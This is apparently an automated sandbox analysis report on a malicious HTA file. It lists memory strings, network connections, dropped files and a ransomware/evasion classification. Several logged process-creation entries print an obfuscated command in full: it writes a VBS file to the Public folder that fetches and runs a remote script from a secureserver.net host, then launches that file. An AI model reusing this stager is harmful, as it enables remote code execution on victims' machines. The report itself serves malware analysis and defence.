Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/7503637854?chave=dk_hm_bn_4_8_oferta-o2o
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/produto/7503637854?chave=dk_hm_bn_4_8_oferta-o2oproduct.__typenameprod
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/7510984306?chave=dk_hm_bn_4_6_oferta-arvore
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535609575.000000000533A000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/7510984342?chave=dk_hm_bn_4_5_oferta-led
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540164157.000000000515D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540707630.0000000004422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540463831.0000000007969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537996386.0000000004420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005159000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanasadvertising.com?utm_source=site_marcas_americanas&utm_medium=botao_footer&utm_
Source: mshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540707630.0000000004422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537996386.0000000004420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanasmarketplace.com.br/?epar=bo_tx_st_am_gw_footer_americanas&utm_source=americana
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000738000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.directlog.com.br/
Source: mshta.exe, 00000000.00000003.536218874.0000000001031000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.524069852.0000000001025000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleadservices.comHJ
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.557799347.0000000000FC5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.536943055.0000000000FC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PDFX6WC
Source: mshta.exe, 00000000.00000003.538243144.000000000072D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PDFX6WC1L
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PDFX6WCC:
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PDFX6WCS
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PDFX6WCggC:
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PDFX6WCr
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-PDFX6WC
Source: mshta.exe, 00000000.00000003.535510317.0000000000FD1000.00000004.00000800.00020000.00000000.sdmp, gtm[1].js.0.drString found in binary or memory: https://www.googletagmanager.com/static/service_worker/
Source: mshta.exe, 00000000.00000003.353819690.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.427896406.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.353810420.0000000000C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/static/service_worker/a.length4
Source: mshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.instagram.com/americanasasP
Source: mshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.instagram.com/americanasra
Source: mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.instagram.com/americanasrouM
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548706573.0000000005281000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.000000000534B000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.procon.rj.gov.br/
Source: mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/CanalAmericanasn
Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49214
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49213
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49222
Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49219
Source: unknownNetwork traffic detected: HTTP traffic on port 49214 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49218
Source: unknownHTTPS traffic detected: 142.250.181.130:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknownHTTPS traffic detected: 16.12.2.60:443 -> 192.168.2.22:49214 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.5.234.55:443 -> 192.168.2.22:49213 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.205.57.102:443 -> 192.168.2.22:49218 version: TLS 1.2
Source: C:\Windows\SysWOW64\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\2-home-destaque_desk-094ccd4f78f0[1].png entropy: 7.99512665468Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\6-home-destaque_desk-e41609a1df26[1].png entropy: 7.9949832587Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1-banners_home_mob-campanhas-home-300x450-9e33bb4000ae[1].png entropy: 7.9931048186Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\LG-Agosto-01082022_americanas-home-banner-TT-192x296.psd-cfd66b2c3a51[1].png entropy: 7.99480829678Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3-banners_home_mob-campanhas-home-300x450-2a15591cfac3[1].png entropy: 7.99178019034Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\2-banners_home_mob-campanhas-home-300x450-5f6717bbeac9[1].png entropy: 7.99278009482Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4-banners_home_mob-campanhas-home-300x450-79e6cb988ba9[1].png entropy: 7.9923090997Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\exclusivo_app-desk-5c02896f8c53[1].png entropy: 7.99642449005Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\destaque-desk-1250x313px-Natal-f25ef34312d3[1].png entropy: 7.99728923827Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sec-brinquedos_esporte-e-lazer-destaque-desk-d071fa982195[1].png entropy: 7.99737611141Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1-home-destaque_desk-6116be1e9cac[1].png entropy: 7.99473999007Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3-home-destaque_desk-cc5a6ad015ea[1].png entropy: 7.99513176329Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\4-home-destaque_desk-150a1979940c[1].png entropy: 7.99326526541Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\8-home-destaque_desk-2c70954c6dab[1].png entropy: 7.9965461878Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\7-home-destaque_desk-7bf2f2fa995c[1].png entropy: 7.99555982174Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\5-home-destaque_desk-d29896bdf9e3[1].png entropy: 7.99515912104Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal88.rans.evad.winHTA@16/61@16/4
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
Source: C:\Windows\SysWOW64\cmd.exeConsole Write: .................!m.....................(.P.............................!s......................................x...............................Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeConsole Write: .................!m.............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.e.s.k.t.o.p.>...................................x...............................Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Archivo-PxFkiLTWYG-23122024095010.hta"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
